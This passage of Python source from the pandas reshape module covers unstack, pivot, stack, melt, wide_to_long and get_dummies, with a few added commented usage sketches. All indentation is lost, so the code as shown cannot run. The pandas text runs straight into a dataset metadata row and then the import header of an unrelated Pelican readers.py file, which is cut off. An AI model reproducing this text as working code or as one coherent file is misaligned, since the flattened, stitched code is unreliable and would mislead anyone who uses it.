new_values = new_values.view('i8')
name = 'int64'
elif is_bool_dtype(values):
sorted_values = sorted_values.astype('object')
new_values = new_values.astype('object')
name = 'object'
else:
sorted_values = sorted_values.astype(name, copy=False)
# fill in our values & mask
f = getattr(_reshape, "unstack_{}".format(name))
f(sorted_values,
mask.view('u1'),
stride,
length,
width,
new_values,
new_mask.view('u1'))
# reconstruct dtype if needed
if needs_i8_conversion(values):
new_values = new_values.view(values.dtype)
return new_values, new_mask
def get_new_columns(self):
if self.value_columns is None:
if self.lift == 0:
return self.removed_level
lev = self.removed_level
return lev.insert(0, _get_na_value(lev.dtype.type))
stride = len(self.removed_level) + self.lift
width = len(self.value_columns)
propagator = np.repeat(np.arange(width), stride)
if isinstance(self.value_columns, MultiIndex):
new_levels = self.value_columns.levels + (self.removed_level,)
new_names = self.value_columns.names + (self.removed_name,)
new_labels = [lab.take(propagator)
for lab in self.value_columns.labels]
else:
new_levels = [self.value_columns, self.removed_level]
new_names = [self.value_columns.name, self.removed_name]
new_labels = [propagator]
new_labels.append(np.tile(np.arange(stride) - self.lift, width))
return MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
def get_new_index(self):
result_labels = [lab.take(self.compressor)
for lab in self.sorted_labels[:-1]]
# construct the new index
if len(self.new_index_levels) == 1:
lev, lab = self.new_index_levels[0], result_labels[0]
if (lab == -1).any():
lev = lev.insert(len(lev), _get_na_value(lev.dtype.type))
return lev.take(lab)
return MultiIndex(levels=self.new_index_levels, labels=result_labels,
names=self.new_index_names, verify_integrity=False)
def _unstack_multiple(data, clocs):
if len(clocs) == 0:
return data
# NOTE: This doesn't deal with hierarchical columns yet
index = data.index
clocs = [index._get_level_number(i) for i in clocs]
rlocs = [i for i in range(index.nlevels) if i not in clocs]
clevels = [index.levels[i] for i in clocs]
clabels = [index.labels[i] for i in clocs]
cnames = [index.names[i] for i in clocs]
rlevels = [index.levels[i] for i in rlocs]
rlabels = [index.labels[i] for i in rlocs]
rnames = [index.names[i] for i in rlocs]
shape = [len(x) for x in clevels]
group_index = get_group_index(clabels, shape, sort=False, xnull=False)
comp_ids, obs_ids = compress_group_index(group_index, sort=False)
recons_labels = decons_obs_group_ids(comp_ids, obs_ids, shape, clabels,
xnull=False)
dummy_index = MultiIndex(levels=rlevels + [obs_ids],
labels=rlabels + [comp_ids],
names=rnames + ['__placeholder__'],
verify_integrity=False)
if isinstance(data, Series):
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__')
new_levels = clevels
new_names = cnames
new_labels = recons_labels
else:
if isinstance(data.columns, MultiIndex):
result = data
for i in range(len(clocs)):
val = clocs[i]
result = result.unstack(val)
clocs = [v if i > v else v - 1 for v in clocs]
return result
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__')
if isinstance(unstacked, Series):
unstcols = unstacked.index
else:
unstcols = unstacked.columns
new_levels = [unstcols.levels[0]] + clevels
new_names = [data.columns.name] + cnames
new_labels = [unstcols.labels[0]]
for rec in recons_labels:
new_labels.append(rec.take(unstcols.labels[-1]))
new_columns = MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
if isinstance(unstacked, Series):
unstacked.index = new_columns
else:
unstacked.columns = new_columns
return unstacked
def pivot(self, index=None, columns=None, values=None):
"""
See DataFrame.pivot
"""
if values is None:
cols = [columns] if index is None else [index, columns]
append = index is None
indexed = self.set_index(cols, append=append)
return indexed.unstack(columns)
else:
if index is None:
index = self.index
else:
index = self[index]
indexed = Series(self[values].values,
index=MultiIndex.from_arrays([index, self[columns]]))
return indexed.unstack(columns)
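# Illustrative sketch, not part of the original pandas source: how the
# pivot() helper above (the implementation behind DataFrame.pivot) reshapes
# long-form data. The column names 'date', 'city' and 'temp' are invented
# for the example.
#
# >>> df = DataFrame({'date': ['d1', 'd1', 'd2', 'd2'],
# ...                 'city': ['LA', 'NY', 'LA', 'NY'],
# ...                 'temp': [20, 10, 21, 11]})
# >>> df.pivot(index='date', columns='city', values='temp')
# city  LA  NY
# date
# d1    20  10
# d2    21  11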
def pivot_simple(index, columns, values):
"""
Produce 'pivot' table based on 3 columns of this DataFrame.
Uses unique values from index / columns and fills with values.
Parameters
----------
index : ndarray
Labels to use to make new frame's index
columns : ndarray
Labels to use to make new frame's columns
values : ndarray
Values to use for populating new frame's values
Notes
-----
Obviously, all 3 of the input arguments must have the same length
Returns
-------
DataFrame
See also
--------
DataFrame.pivot_table : generalization of pivot that can handle
duplicate values for one index/column pair
"""
if (len(index) != len(columns)) or (len(columns) != len(values)):
raise AssertionError('Length of index, columns, and values must be the'
' same')
if len(index) == 0:
return DataFrame(index=[])
hindex = MultiIndex.from_arrays([index, columns])
series = Series(values.ravel(), index=hindex)
series = series.sort_index(level=0)
return series.unstack()
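# Illustrative sketch, not part of the original pandas source: pivot_simple()
# builds a frame from three parallel arrays; missing (index, column) pairs
# come out as NaN. The array contents are invented for the example.
#
# >>> index = np.array(['r1', 'r1', 'r2'])
# >>> columns = np.array(['a', 'b', 'a'])
# >>> values = np.array([1.0, 2.0, 3.0])
# >>> pivot_simple(index, columns, values)
#       a    b
# r1  1.0  2.0
# r2  3.0  NaN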
def _slow_pivot(index, columns, values):
"""
Produce 'pivot' table based on 3 columns of this DataFrame.
Uses unique values from index / columns and fills with values.
Parameters
----------
index : string or object
Column name to use to make new frame's index
columns : string or object
Column name to use to make new frame's columns
values : string or object
Column name to use for populating new frame's values
Could benefit from some Cython here.
"""
tree = {}
for i, (idx, col) in enumerate(zip(index, columns)):
if col not in tree:
tree[col] = {}
branch = tree[col]
branch[idx] = values[i]
return DataFrame(tree)
def unstack(obj, level, fill_value=None):
if isinstance(level, (tuple, list)):
return _unstack_multiple(obj, level)
if isinstance(obj, DataFrame):
if isinstance(obj.index, MultiIndex):
return _unstack_frame(obj, level, fill_value=fill_value)
else:
return obj.T.stack(dropna=False)
else:
unstacker = _Unstacker(obj.values, obj.index, level=level,
fill_value=fill_value)
return unstacker.get_result()
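# Illustrative sketch, not part of the original pandas source: the effect of
# fill_value when a (row, column) combination is missing from the MultiIndex.
# The data is invented for the example.
#
# >>> idx = MultiIndex.from_tuples([('one', 'a'), ('one', 'b'), ('two', 'a')])
# >>> s = Series([1, 2, 3], index=idx)
# >>> unstack(s, -1, fill_value=0)
#      a  b
# one  1  2
# two  3  0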
def _unstack_frame(obj, level, fill_value=None):
from pandas.core.internals import BlockManager, make_block
if obj._is_mixed_type:
unstacker = _Unstacker(np.empty(obj.shape, dtype=bool), # dummy
obj.index, level=level,
value_columns=obj.columns)
new_columns = unstacker.get_new_columns()
new_index = unstacker.get_new_index()
new_axes = [new_columns, new_index]
new_blocks = []
mask_blocks = []
for blk in obj._data.blocks:
blk_items = obj._data.items[blk.mgr_locs.indexer]
bunstacker = _Unstacker(blk.values.T, obj.index, level=level,
value_columns=blk_items,
fill_value=fill_value)
new_items = bunstacker.get_new_columns()
new_placement = new_columns.get_indexer(new_items)
new_values, mask = bunstacker.get_new_values()
mblk = make_block(mask.T, placement=new_placement)
mask_blocks.append(mblk)
newb = make_block(new_values.T, placement=new_placement)
new_blocks.append(newb)
result = DataFrame(BlockManager(new_blocks, new_axes))
mask_frame = DataFrame(BlockManager(mask_blocks, new_axes))
return result.loc[:, mask_frame.sum(0) > 0]
else:
unstacker = _Unstacker(obj.values, obj.index, level=level,
value_columns=obj.columns,
fill_value=fill_value)
return unstacker.get_result()
def stack(frame, level=-1, dropna=True):
"""
Convert DataFrame to Series with multi-level Index. Columns become the
second level of the resulting hierarchical index
Returns
-------
stacked : Series
"""
def factorize(index):
if index.is_unique:
return index, np.arange(len(index))
codes, categories = _factorize_from_iterable(index)
return categories, codes
N, K = frame.shape
if isinstance(frame.columns, MultiIndex):
if frame.columns._reference_duplicate_name(level):
msg = ("Ambiguous reference to {0}. The column "
"names are not unique.".format(level))
raise ValueError(msg)
# Will also convert negative level numbers and check if out of bounds.
level_num = frame.columns._get_level_number(level)
if isinstance(frame.columns, MultiIndex):
return _stack_multi_columns(frame, level_num=level_num, dropna=dropna)
elif isinstance(frame.index, MultiIndex):
new_levels = list(frame.index.levels)
new_labels = [lab.repeat(K) for lab in frame.index.labels]
clev, clab = factorize(frame.columns)
new_levels.append(clev)
new_labels.append(np.tile(clab, N).ravel())
new_names = list(frame.index.names)
new_names.append(frame.columns.name)
new_index = MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
else:
levels, (ilab, clab) = zip(*map(factorize, (frame.index,
frame.columns)))
labels = ilab.repeat(K), np.tile(clab, N).ravel()
new_index = MultiIndex(levels=levels, labels=labels,
names=[frame.index.name, frame.columns.name],
verify_integrity=False)
new_values = frame.values.ravel()
if dropna:
mask = notna(new_values)
new_values = new_values[mask]
new_index = new_index[mask]
return Series(new_values, index=new_index)
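# Illustrative sketch, not part of the original pandas source: stack() is the
# rough inverse of unstack(), moving the columns into the innermost index
# level. The frame is invented for the example.
#
# >>> df = DataFrame({'a': [1, 3], 'b': [2, 4]}, index=['one', 'two'])
# >>> stack(df)
# one  a    1
#      b    2
# two  a    3
#      b    4
# dtype: int64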
def stack_multiple(frame, level, dropna=True):
# If all passed levels match up to column names, no
# ambiguity about what to do
if all(lev in frame.columns.names for lev in level):
result = frame
for lev in level:
result = stack(result, lev, dropna=dropna)
# Otherwise, level numbers may change as each successive level is stacked
elif all(isinstance(lev, int) for lev in level):
# As each stack is done, the level numbers decrease, so we need
# to account for that when level is a sequence of ints
result = frame
# _get_level_number() checks level numbers are in range and converts
# negative numbers to positive
level = [frame.columns._get_level_number(lev) for lev in level]
# Can't iterate directly through level as we might need to change
# values as we go
for index in range(len(level)):
lev = level[index]
result = stack(result, lev, dropna=dropna)
# Decrement all level numbers greater than current, as these
# have now shifted down by one
updated_level = []
for other in level:
if other > lev:
updated_level.append(other - 1)
else:
updated_level.append(other)
level = updated_level
else:
raise ValueError("level should contain all level names or all level "
"numbers, not a mixture of the two.")
return result
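# Illustrative sketch, not part of the original pandas source: stacking two
# named column levels in one call. The frame and level names are invented for
# the example; the values come back as floats because the missing ('y', 'b')
# combination introduces NaN before dropna removes it.
#
# >>> cols = MultiIndex.from_tuples([('x', 'a'), ('x', 'b'), ('y', 'a')],
# ...                               names=['letter', 'sub'])
# >>> df = DataFrame([[1, 2, 3], [4, 5, 6]], columns=cols)
# >>> stacked = stack_multiple(df, ['letter', 'sub'])
# >>> stacked[(0, 'x', 'b')]
# 2.0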
def _stack_multi_columns(frame, level_num=-1, dropna=True):
def _convert_level_number(level_num, columns):
"""
Logic for converting the level number to something we can safely pass
to swaplevel:
We generally want to convert the level number into a level name, except
when columns do not have names, in which case we must leave as a level
number
"""
if level_num in columns.names:
return columns.names[level_num]
else:
if columns.names[level_num] is None:
return level_num
else:
return columns.names[level_num]
this = frame.copy()
# this makes life much simpler
if level_num != frame.columns.nlevels - 1:
# roll levels to put selected level at end
roll_columns = this.columns
for i in range(level_num, frame.columns.nlevels - 1):
# Need to check if the ints conflict with level names
lev1 = _convert_level_number(i, roll_columns)
lev2 = _convert_level_number(i + 1, roll_columns)
roll_columns = roll_columns.swaplevel(lev1, lev2)
this.columns = roll_columns
if not this.columns.is_lexsorted():
# Workaround the edge case where 0 is one of the column names,
# which interferes with trying to sort based on the first
# level
level_to_sort = _convert_level_number(0, this.columns)
this = this.sort_index(level=level_to_sort, axis=1)
# tuple list excluding level for grouping columns
if len(frame.columns.levels) > 2:
tuples = list(zip(*[lev.take(lab)
for lev, lab in zip(this.columns.levels[:-1],
this.columns.labels[:-1])]))
unique_groups = [key for key, _ in itertools.groupby(tuples)]
new_names = this.columns.names[:-1]
new_columns = MultiIndex.from_tuples(unique_groups, names=new_names)
else:
new_columns = unique_groups = this.columns.levels[0]
# time to ravel the values
new_data = {}
level_vals = this.columns.levels[-1]
level_labels = sorted(set(this.columns.labels[-1]))
level_vals_used = level_vals[level_labels]
levsize = len(level_labels)
drop_cols = []
for key in unique_groups:
loc = this.columns.get_loc(key)
# can make more efficient?
# we almost always return a slice
# but if unsorted can get a boolean
# indexer
if not isinstance(loc, slice):
slice_len = len(loc)
else:
slice_len = loc.stop - loc.start
if slice_len == 0:
drop_cols.append(key)
continue
elif slice_len != levsize:
chunk = this.loc[:, this.columns[loc]]
chunk.columns = level_vals.take(chunk.columns.labels[-1])
value_slice = chunk.reindex(columns=level_vals_used).values
else:
if frame._is_mixed_type:
value_slice = this.loc[:, this.columns[loc]].values
else:
value_slice = this.values[:, loc]
new_data[key] = value_slice.ravel()
if len(drop_cols) > 0:
new_columns = new_columns.difference(drop_cols)
N = len(this)
if isinstance(this.index, MultiIndex):
new_levels = list(this.index.levels)
new_names = list(this.index.names)
new_labels = [lab.repeat(levsize) for lab in this.index.labels]
else:
new_levels = [this.index]
new_labels = [np.arange(N).repeat(levsize)]
new_names = [this.index.name] # something better?
new_levels.append(level_vals)
new_labels.append(np.tile(level_labels, N))
new_names.append(frame.columns.names[level_num])
new_index = MultiIndex(levels=new_levels, labels=new_labels,
names=new_names, verify_integrity=False)
result = DataFrame(new_data, index=new_index, columns=new_columns)
# more efficient way to go about this? can do the whole masking biz but
# will only save a small amount of time...
if dropna:
result = result.dropna(axis=0, how='all')
return result
@Appender(_shared_docs['melt'] %
dict(caller='pd.melt(df, ',
versionadded="",
other='DataFrame.melt'))
def melt(frame, id_vars=None, value_vars=None, var_name=None,
value_name='value', col_level=None):
# TODO: what about the existing index?
if id_vars is not None:
if not is_list_like(id_vars):
id_vars = [id_vars]
elif (isinstance(frame.columns, MultiIndex) and
not isinstance(id_vars, list)):
raise ValueError('id_vars must be a list of tuples when columns'
' are a MultiIndex')
else:
id_vars = list(id_vars)
else:
id_vars = []
if value_vars is not None:
if not is_list_like(value_vars):
value_vars = [value_vars]
elif (isinstance(frame.columns, MultiIndex) and
not isinstance(value_vars, list)):
raise ValueError('value_vars must be a list of tuples when'
' columns are a MultiIndex')
else:
value_vars = list(value_vars)
frame = frame.loc[:, id_vars + value_vars]
else:
frame = frame.copy()
if col_level is not None: # allow list or other?
# frame is a copy
frame.columns = frame.columns.get_level_values(col_level)
if var_name is None:
if isinstance(frame.columns, MultiIndex):
if len(frame.columns.names) == len(set(frame.columns.names)):
var_name = frame.columns.names
else:
var_name = ['variable_%s' % i
for i in range(len(frame.columns.names))]
else:
var_name = [frame.columns.name if frame.columns.name is not None
else 'variable']
if isinstance(var_name, compat.string_types):
var_name = [var_name]
N, K = frame.shape
K -= len(id_vars)
mdata = {}
for col in id_vars:
mdata[col] = np.tile(frame.pop(col).values, K)
mcolumns = id_vars + var_name + [value_name]
mdata[value_name] = frame.values.ravel('F')
for i, col in enumerate(var_name):
# asanyarray will keep the columns as an Index
mdata[col] = np.asanyarray(frame.columns
._get_level_values(i)).repeat(N)
return DataFrame(mdata, columns=mcolumns)
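# Illustrative sketch, not part of the original pandas source: unpivoting a
# wide frame into id/variable/value triples. The frame is invented for the
# example.
#
# >>> df = DataFrame({'id': [1, 2], 'x': [10, 30], 'y': [20, 40]})
# >>> melt(df, id_vars=['id'], value_vars=['x', 'y'])
#    id variable  value
# 0   1        x     10
# 1   2        x     30
# 2   1        y     20
# 3   2        y     40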
def lreshape(data, groups, dropna=True, label=None):
"""
Reshape long-format data to wide. Generalized inverse of DataFrame.pivot
Parameters
----------
data : DataFrame
groups : dict
{new_name : list_of_columns}
dropna : boolean, default True
Examples
--------
>>> import pandas as pd
>>> data = pd.DataFrame({'hr1': [514, 573], 'hr2': [545, 526],
... 'team': ['Red Sox', 'Yankees'],
... 'year1': [2007, 2007], 'year2': [2008, 2008]})
>>> data
hr1 hr2 team year1 year2
0 514 545 Red Sox 2007 2008
1 573 526 Yankees 2007 2008
>>> pd.lreshape(data, {'year': ['year1', 'year2'], 'hr': ['hr1', 'hr2']})
team year hr
0 Red Sox 2007 514
1 Yankees 2007 573
2 Red Sox 2008 545
3 Yankees 2008 526
Returns
-------
reshaped : DataFrame
"""
if isinstance(groups, dict):
keys = list(groups.keys())
values = list(groups.values())
else:
keys, values = zip(*groups)
all_cols = list(set.union(*[set(x) for x in values]))
id_cols = list(data.columns.difference(all_cols))
K = len(values[0])
for seq in values:
if len(seq) != K:
raise ValueError('All column lists must be same length')
mdata = {}
pivot_cols = []
for target, names in zip(keys, values):
to_concat = [data[col].values for col in names]
mdata[target] = _concat._concat_compat(to_concat)
pivot_cols.append(target)
for col in id_cols:
mdata[col] = np.tile(data[col].values, K)
if dropna:
mask = np.ones(len(mdata[pivot_cols[0]]), dtype=bool)
for c in pivot_cols:
mask &= notna(mdata[c])
if not mask.all():
mdata = dict((k, v[mask]) for k, v in compat.iteritems(mdata))
return DataFrame(mdata, columns=id_cols + pivot_cols)
def wide_to_long(df, stubnames, i, j, sep="", suffix='\d+'):
r"""
Wide panel to long format. Less flexible but more user-friendly than melt.
With stubnames ['A', 'B'], this function expects to find one or more
    groups of columns with format Asuffix1, Asuffix2,..., Bsuffix1, Bsuffix2,...
You specify what you want to call this suffix in the resulting long format
with `j` (for example `j='year'`)
    Each row of these wide variables is assumed to be uniquely identified by
`i` (can be a single column name or a list of column names)
All remaining variables in the data frame are left intact.
Parameters
----------
df : DataFrame
The wide-format DataFrame
stubnames : str or list-like
The stub name(s). The wide format variables are assumed to
start with the stub names.
i : str or list-like
Column(s) to use as id variable(s)
j : str
The name of the subobservation variable. What you wish to name your
suffix in the long format.
sep : str, default ""
A character indicating the separation of the variable names
in the wide format, to be stripped from the names in the long format.
For example, if your column names are A-suffix1, A-suffix2, you
        can strip the hyphen by specifying `sep='-'`
.. versionadded:: 0.20.0
suffix : str, default '\\d+'
A regular expression capturing the wanted suffixes. '\\d+' captures
numeric suffixes. Suffixes with no numbers could be specified with the
negated character class '\\D+'. You can also further disambiguate
suffixes, for example, if your wide variables are of the form
Aone, Btwo,.., and you have an unrelated column Arating, you can
ignore the last one by specifying `suffix='(!?one|two)'`
.. versionadded:: 0.20.0
Returns
-------
DataFrame
A DataFrame that contains each stub name as a variable, with new index
(i, j)
Examples
--------
>>> import pandas as pd
>>> import numpy as np
>>> np.random.seed(123)
>>> df = pd.DataFrame({"A1970" : {0 : "a", 1 : "b", 2 : "c"},
... "A1980" : {0 : "d", 1 : "e", 2 : "f"},
... "B1970" : {0 : 2.5, 1 : 1.2, 2 : .7},
... "B1980" : {0 : 3.2, 1 : 1.3, 2 : .1},
... "X" : dict(zip(range(3), np.random.randn(3)))
... })
>>> df["id"] = df.index
>>> df
A1970 A1980 B1970 B1980 X id
0 a d 2.5 3.2 -1.085631 0
1 b e 1.2 1.3 0.997345 1
2 c f 0.7 0.1 0.282978 2
>>> pd.wide_to_long(df, ["A", "B"], i="id", j="year")
... # doctest: +NORMALIZE_WHITESPACE
X A B
id year
0 1970 -1.085631 a 2.5
1 1970 0.997345 b 1.2
2 1970 0.282978 c 0.7
0 1980 -1.085631 d 3.2
1 1980 0.997345 e 1.3
2 1980 0.282978 f 0.1
    With multiple id columns
>>> df = pd.DataFrame({
... 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],
... 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],
... 'ht1': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],
... 'ht2': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]
... })
>>> df
birth famid ht1 ht2
0 1 1 2.8 3.4
1 2 1 2.9 3.8
2 3 1 2.2 2.9
3 1 2 2.0 3.2
4 2 2 1.8 2.8
5 3 2 1.9 2.4
6 1 3 2.2 3.3
7 2 3 2.3 3.4
8 3 3 2.1 2.9
>>> l = pd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age')
>>> l
... # doctest: +NORMALIZE_WHITESPACE
ht
famid birth age
1 1 1 2.8
2 3.4
2 1 2.9
2 3.8
3 1 2.2
2 2.9
2 1 1 2.0
2 3.2
2 1 1.8
2 2.8
3 1 1.9
2 2.4
3 1 1 2.2
2 3.3
2 1 2.3
2 3.4
3 1 2.1
2 2.9
Going from long back to wide just takes some creative use of `unstack`
>>> w = l.reset_index().set_index(['famid', 'birth', 'age']).unstack()
>>> w.columns = pd.Index(w.columns).str.join('')
>>> w.reset_index()
famid birth ht1 ht2
0 1 1 2.8 3.4
1 1 2 2.9 3.8
2 1 3 2.2 2.9
3 2 1 2.0 3.2
4 2 2 1.8 2.8
5 2 3 1.9 2.4
6 3 1 2.2 3.3
7 3 2 2.3 3.4
8 3 3 2.1 2.9
Less wieldy column names are also handled
>>> np.random.seed(0)
>>> df = pd.DataFrame({'A(quarterly)-2010': np.random.rand(3),
... 'A(quarterly)-2011': np.random.rand(3),
... 'B(quarterly)-2010': np.random.rand(3),
... 'B(quarterly)-2011': np.random.rand(3),
... 'X' : np.random.randint(3, size=3)})
>>> df['id'] = df.index
>>> df # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS
A(quarterly)-2010 A(quarterly)-2011 B(quarterly)-2010 ...
0 0.548814 0.544883 0.437587 ...
1 0.715189 0.423655 0.891773 ...
2 0.602763 0.645894 0.963663 ...
X id
0 0 0
1 1 1
2 1 2
>>> pd.wide_to_long(df, ['A(quarterly)', 'B(quarterly)'], i='id',
... j='year', sep='-')
... # doctest: +NORMALIZE_WHITESPACE
X A(quarterly) B(quarterly)
id year
0 2010 0 0.548814 0.437587
1 2010 1 0.715189 0.891773
2 2010 1 0.602763 0.963663
0 2011 0 0.544883 0.383442
1 2011 1 0.423655 0.791725
2 2011 1 0.645894 0.528895
If we have many columns, we could also use a regex to find our
stubnames and pass that list on to wide_to_long
>>> stubnames = sorted(
... set([match[0] for match in df.columns.str.findall(
... r'[A-B]\(.*\)').values if match != [] ])
... )
>>> list(stubnames)
['A(quarterly)', 'B(quarterly)']
Notes
-----
All extra variables are left untouched. This simply uses
`pandas.melt` under the hood, but is hard-coded to "do the right thing"
    in a typical case.
"""
def get_var_names(df, stub, sep, suffix):
regex = "^{0}{1}{2}".format(re.escape(stub), re.escape(sep), suffix)
return df.filter(regex=regex).columns.tolist()
def melt_stub(df, stub, i, j, value_vars, sep):
newdf = melt(df, id_vars=i, value_vars=value_vars,
value_name=stub.rstrip(sep), var_name=j)
newdf[j] = Categorical(newdf[j])
newdf[j] = newdf[j].str.replace(re.escape(stub + sep), "")
return newdf.set_index(i + [j])
if any(map(lambda s: s in df.columns.tolist(), stubnames)):
raise ValueError("stubname can't be identical to a column name")
if not is_list_like(stubnames):
stubnames = [stubnames]
else:
stubnames = list(stubnames)
if not is_list_like(i):
i = [i]
else:
i = list(i)
if df[i].duplicated().any():
raise ValueError("the id variables need to uniquely identify each row")
value_vars = list(map(lambda stub:
get_var_names(df, stub, sep, suffix), stubnames))
value_vars_flattened = [e for sublist in value_vars for e in sublist]
id_vars = list(set(df.columns.tolist()).difference(value_vars_flattened))
melted = []
for s, v in zip(stubnames, value_vars):
melted.append(melt_stub(df, s, i, j, v, sep))
melted = melted[0].join(melted[1:], how='outer')
if len(i) == 1:
new = df[id_vars].set_index(i).join(melted)
return new
new = df[id_vars].merge(melted.reset_index(), on=i).set_index(i + [j])
return new
def get_dummies(data, prefix=None, prefix_sep='_', dummy_na=False,
columns=None, sparse=False, drop_first=False):
"""
Convert categorical variable into dummy/indicator variables
Parameters
----------
data : array-like, Series, or DataFrame
prefix : string, list of strings, or dict of strings, default None
String to append DataFrame column names
Pass a list with length equal to the number of columns
        when calling get_dummies on a DataFrame. Alternatively, `prefix`
can be a dictionary mapping column names to prefixes.
prefix_sep : string, default '_'
If appending prefix, separator/delimiter to use. Or pass a
list or dictionary as with `prefix.`
dummy_na : bool, default False
Add a column to indicate NaNs, if False NaNs are ignored.
columns : list-like, default None
Column names in the DataFrame to be encoded.
If `columns` is None then all the columns with
`object` or `category` dtype will be converted.
sparse : bool, default False
Whether the dummy columns should be sparse or not. Returns
SparseDataFrame if `data` is a Series or if all columns are included.
Otherwise returns a DataFrame with some SparseBlocks.
.. versionadded:: 0.16.1
drop_first : bool, default False
Whether to get k-1 dummies out of k categorical levels by removing the
first level.
.. versionadded:: 0.18.0
Returns
-------
dummies : DataFrame or SparseDataFrame
Examples
--------
>>> import pandas as pd
>>> s = pd.Series(list('abca'))
>>> pd.get_dummies(s)
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
>>> s1 = ['a', 'b', np.nan]
>>> pd.get_dummies(s1)
a b
0 1 0
1 0 1
2 0 0
>>> pd.get_dummies(s1, dummy_na=True)
a b NaN
0 1 0 0
1 0 1 0
2 0 0 1
>>> df = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],
... 'C': [1, 2, 3]})
>>> pd.get_dummies(df, prefix=['col1', 'col2'])
C col1_a col1_b col2_a col2_b col2_c
0 1 1 0 0 1 0
1 2 0 1 1 0 0
2 3 1 0 0 0 1
>>> pd.get_dummies(pd.Series(list('abcaa')))
a b c
0 1 0 0
1 0 1 0
2 0 0 1
3 1 0 0
4 1 0 0
>>> pd.get_dummies(pd.Series(list('abcaa')), drop_first=True)
b c
0 0 0
1 1 0
2 0 1
3 0 0
4 0 0
See Also
--------
Series.str.get_dummies
"""
from pandas.core.reshape.concat import concat
from itertools import cycle
if isinstance(data, DataFrame):
# determine columns being encoded
if columns is None:
columns_to_encode = data.select_dtypes(
include=['object', 'category']).columns
else:
columns_to_encode = columns
# validate prefixes and separator to avoid silently dropping cols
def check_len(item, name):
length_msg = ("Length of '{0}' ({1}) did not match the length of "
"the columns being encoded ({2}).")
if is_list_like(item):
if not len(item) == len(columns_to_encode):
raise ValueError(length_msg.format(name, len(item),
len(columns_to_encode)))
check_len(prefix, 'prefix')
check_len(prefix_sep, 'prefix_sep')
if isinstance(prefix, compat.string_types):
prefix = cycle([prefix])
if isinstance(prefix, dict):
prefix = [prefix[col] for col in columns_to_encode]
if prefix is None:
prefix = columns_to_encode
# validate separators
if isinstance(prefix_sep, compat.string_types):
prefix_sep = cycle([prefix_sep])
elif isinstance(prefix_sep, dict):
prefix_sep = [prefix_sep[col] for col in columns_to_encode]
if set(columns_to_encode) == set(data.columns):
with_dummies = []
else:
with_dummies = [data.drop(columns_to_encode, axis=1)]
for (col, pre, sep) in zip(columns_to_encode, prefix, prefix_sep):
dummy = _get_dummies_1d(data[col], prefix=pre, prefix_sep=sep,
dummy_na=dummy_na, sparse=sparse,
drop_first=drop_first)
with_dummies.append(dummy)
result = concat(with_dummies, axis=1)
else:
result = _get_dummies_1d(data, prefix, prefix_sep, dummy_na,
sparse=sparse, drop_first=drop_first)
return result
def _get_dummies_1d(data, prefix, prefix_sep='_', dummy_na=False,
sparse=False, drop_first=False):
# Series avoids inconsistent NaN handling
codes, levels = _factorize_from_iterable(Series(data))
def get_empty_Frame(data, sparse):
if isinstance(data, Series):
index = data.index
else:
index = np.arange(len(data))
if not sparse:
return DataFrame(index=index)
else:
return SparseDataFrame(index=index, default_fill_value=0)
# if all NaN
if not dummy_na and len(levels) == 0:
return get_empty_Frame(data, sparse)
codes = codes.copy()
if dummy_na:
codes[codes == -1] = len(levels)
levels = np.append(levels, np.nan)
# if dummy_na, we just fake a nan level. drop_first will drop it again
if drop_first and len(levels) == 1:
return get_empty_Frame(data, sparse)
number_of_cols = len(levels)
if prefix is not None:
dummy_cols = ['%s%s%s' % (prefix, prefix_sep, v) for v in levels]
else:
dummy_cols = levels
if isinstance(data, Series):
index = data.index
else:
index = None
if sparse:
sparse_series = {}
N = len(data)
sp_indices = [[] for _ in range(len(dummy_cols))]
for ndx, code in enumerate(codes):
if code == -1:
# Blank entries if not dummy_na and code == -1, #GH4446
continue
sp_indices[code].append(ndx)
if drop_first:
# remove first categorical level to avoid perfect collinearity
# GH12042
sp_indices = sp_indices[1:]
dummy_cols = dummy_cols[1:]
for col, ixs in zip(dummy_cols, sp_indices):
sarr = SparseArray(np.ones(len(ixs), dtype=np.uint8),
sparse_index=IntIndex(N, ixs), fill_value=0,
dtype=np.uint8)
sparse_series[col] = SparseSeries(data=sarr, index=index)
out = SparseDataFrame(sparse_series, index=index, columns=dummy_cols,
default_fill_value=0,
dtype=np.uint8)
return out
else:
dummy_mat = np.eye(number_of_cols, dtype=np.uint8).take(codes, axis=0)
if not dummy_na:
# reset NaN GH4446
dummy_mat[codes == -1] = 0
if drop_first:
# remove first GH12042
dummy_mat = dummy_mat[:, 1:]
dummy_cols = dummy_cols[1:]
return DataFrame(dummy_mat, index=index, columns=dummy_cols)
def make_axis_dummies(frame, axis='minor', transform=None):
"""
Construct 1-0 dummy variables corresponding to designated axis
labels
Parameters
----------
frame : DataFrame
axis : {'major', 'minor'}, default 'minor'
transform : function, default None
Function to apply to axis labels first. For example, to
get "day of week" dummies in a time series regression
you might call::
make_axis_dummies(panel, axis='major',
transform=lambda d: d.weekday())
Returns
-------
dummies : DataFrame
Column names taken from chosen axis
"""
numbers = {'major': 0, 'minor': 1}
num = numbers.get(axis, axis)
items = frame.index.levels[num]
labels = frame.index.labels[num]
if transform is not None:
mapped_items = items.map(transform)
labels, items = _factorize_from_iterable(mapped_items.take(labels))
values = np.eye(len(items), dtype=float)
values = values.take(labels, axis=0)
return DataFrame(values, columns=items, index=frame.index)
| gpl-2.0 | 8,329,274,033,396,292,000 | 33.239163 | 79 | 0.56005 | false |
zackw/pelican | pelican/readers.py | 1 | 25554 | # -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
import logging
import os
import re
from collections import OrderedDict
import docutils
import docutils.core
import docutils.io
from docutils.writers.html4css1 import HTMLTranslator, Writer
import six
from six.moves.html_parser import HTMLParser
from pelican import rstdirectives # NOQA
from pelican import signals
from pelican.cache import FileStampDataCacher
from pelican.contents import Author, Category, Page, Tag
